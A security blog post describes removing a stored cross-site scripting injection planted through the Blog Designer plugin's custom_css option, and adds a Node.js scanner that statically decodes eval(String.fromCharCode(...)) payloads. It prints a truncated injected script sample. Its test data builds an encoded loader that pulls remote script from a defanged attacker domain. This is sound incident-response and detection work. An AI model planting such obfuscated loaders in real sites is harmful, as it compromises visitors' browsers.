Cross-Site Scripting with Blog Designer Plugin

This time we had to clean a stored cross-site scripting injection out of a site database, caused by a vulnerability in the Blog Designer plugin. It was fairly simple to locate the malicious script: it had been added by changing the plugin's “custom_css” option value, so the injected code was output wherever the plugin's custom styles were rendered. Removing the script alone does not close the hole that let it in; the vulnerable plugin still needs to be patched or removed.

Sample code (truncated; the leading character codes 118, 97, 114 decode to “var”):

<script language=javascript>eval(String.fromCharCode(118, 97, 114

Users were directed to hxxps://stats.garrygudini[.]com/flask.js?t=t& (defanged); the domain is now blacklisted by ESET, McAfee and Sucuri Labs.
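The injection above hides its loader behind eval(String.fromCharCode(...)) so that a plain text search for the domain finds nothing. The following scanner is an added example, not code from the original post or from the Blog Designer project: it takes option values such as custom_css, flags script tags and eval(), statically decodes every numeric String.fromCharCode() call without executing it, and checks the decoded text against indicators taken from the post (the domain and the flask.js?t=t path). The option rows, and the loader hidden inside the injected one, are constructed sample data; the loader body is an assumption about what the truncated payload continued with.

```javascript
// Added example, not code from the original post. Statically decodes
// eval(String.fromCharCode(...)) payloads found in stored option values
// (such as Blog Designer's custom_css) and flags the injected rows, without
// ever executing the attacker's JavaScript.

// Matches a String.fromCharCode(...) call whose arguments are plain numbers.
const FROM_CHAR_CODE_RE = /String\.fromCharCode\s*\(\s*([\d\s,]+)\)/g;

// Decode every numeric String.fromCharCode(...) call in `text`.
// Returns the decoded strings; calls with non-numeric arguments are skipped.
function decodeFromCharCode(text) {
  const decoded = [];
  for (const match of text.matchAll(FROM_CHAR_CODE_RE)) {
    const codes = match[1]
      .split(',')
      .map((s) => s.trim())
      .filter((s) => s.length > 0)
      .map(Number);
    if (codes.some((c) => !Number.isInteger(c) || c < 0 || c > 0xffff)) continue;
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// Inspect one option value. `indicators` are substrings (domains, paths)
// known from the incident; they are matched against the decoded payload,
// where the attacker expects them to stay hidden.
function scanOptionValue(name, value, indicators) {
  const findings = [];
  if (/<script\b/i.test(value)) findings.push(`script tag inside ${name}`);
  if (/\beval\s*\(/.test(value)) findings.push(`eval() inside ${name}`);
  const decoded = decodeFromCharCode(value);
  for (const payload of decoded) {
    for (const ind of indicators) {
      if (payload.includes(ind)) findings.push(`decoded payload references "${ind}"`);
    }
  }
  return { name, suspicious: findings.length > 0, findings, decoded };
}

// Indicators: the domain and script path named in the post.
const INDICATORS = ['garrygudini', 'flask.js?t=t'];

// Constructed sample data (not from the infected site). The hidden loader is
// an assumption about what the truncated payload in the post continued with.
const HIDDEN_LOADER =
  'var s=document.createElement("script");s.src="hxxps://stats.garrygudini[.]com/flask.js?t=t&";document.body.appendChild(s);';
const encoded = Array.from(HIDDEN_LOADER, (ch) => ch.charCodeAt(0)).join(', ');

const CLEAN_CUSTOM_CSS = '.blog-designer h2 { color: #333; }';
const INJECTED_CUSTOM_CSS =
  CLEAN_CUSTOM_CSS +
  `\n<script language=javascript>eval(String.fromCharCode(${encoded}))</script>`;

// Run the scanner over a couple of wp_options-style rows.
function scanRows(rows) {
  return rows.map(({ name, value }) => scanOptionValue(name, value, INDICATORS));
}

for (const result of scanRows([
  { name: 'custom_css', value: CLEAN_CUSTOM_CSS },
  { name: 'custom_css', value: INJECTED_CUSTOM_CSS },
])) {
  console.log(result.suspicious ? 'SUSPICIOUS' : 'clean', result.findings);
}
```

Run it with node; to use it on a real cleanup, replace the constructed rows with the option values exported from the database and extend INDICATORS with whatever domains the decoded payloads reveal. Decoding statically rather than with eval() matters: the point of the exercise is to read what the payload would do without giving it a chance to do it.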